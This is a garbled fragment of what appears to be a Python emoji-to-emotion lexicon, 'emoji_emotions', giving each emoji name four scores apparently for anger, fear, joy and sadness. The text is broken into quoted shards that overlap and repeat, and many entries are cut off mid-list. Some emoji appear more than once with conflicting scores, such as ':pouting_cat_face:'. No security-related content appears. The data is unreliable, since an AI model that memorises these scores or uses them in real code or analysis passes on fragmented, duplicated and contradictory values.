\":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001,", "0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092,", "[0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187,", "0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\":", "[0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998,", "[0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345,", "\":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162,", "\":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136,", "0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\":", "0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\":", "0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212,", "0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326],", "0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\":", "[0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305,", "[0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095,", "0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142,", "0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15,", "\":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996,", "0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\":", "0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\":", "[0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136,", "0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349,", "0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998],", "0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067,", "0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415,", "joy, sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141,", "0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214],", "0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\":", "\":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196,", "\":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214,", "\":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999,", "[0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001,", "0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\":", "0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\":", "\":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997,", "0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999,", "0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065,", "0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25,", "0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157,", "[0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001,", "\":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179,", "\":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295,", "0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\":", "0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151],", "0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998,", "[0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163,", "0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171,", "[0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171,", "0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094],", "0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361],", "0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106],", "\":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126,", "0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147],", "[0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997,", "\":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002,", "0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159],", "[0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231,", "0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998],", "\":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22,", "0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003],", "\":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001,", "0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335],", "anger, fear, joy, sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\":", "0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\":", "0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\":", "0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109],", "[0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253,", "0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\":", "\":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218,", "[0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256,", "\":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997,", "\":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297,", "0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233,", "\":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396,", "[0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003,", "\":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109,", "\":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182,", "\":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242,", "\":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263,", "0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22],", "\":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212,", "\":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248,", "\":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22,", "0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289],", "0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153,", "0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003],", "0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195,", "\":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183,", "[0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319,", "\":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201,", "\":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276,", "0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128],", "0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09,", "[0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069,", "0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\":", "0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\":", "0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122,", "0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998,", "0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264],", "0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998],", "[0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198,", "[0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174,", "0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249,", "[0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292,", "0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\":", "0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\":", "[0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003,", "0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\":", "\":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002,", "[0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128,", "0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084],", "\":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172,", "0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\":", "\":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004,", "0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998],", "0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\":", "[0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392,", "0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996,", "\":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147,", "0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233],", "0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235,", "\":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001,", "[0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994,", "\":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162,", "0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214,", "[0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317,", "0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\":", "[0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998,", "0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157,", "0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\":", "0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131,", "\":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002,", "0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\":", "0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128,", "0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\":", "\":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156,", "0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\":", "0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124,", "0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\":", "0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128,", "\":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002,", "0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\":", "0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\":", "0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\":", "0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139],", "\":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18,", "0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152],", "[0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002,", "0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223,", "\":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255,", "[0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222,", "[0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294,", "0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17,", "0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996,", "\":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003,", "0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272],", "[0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081,", "0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239],", "[0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081,", "0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\":", "0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002,", "0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278,", "0.152, 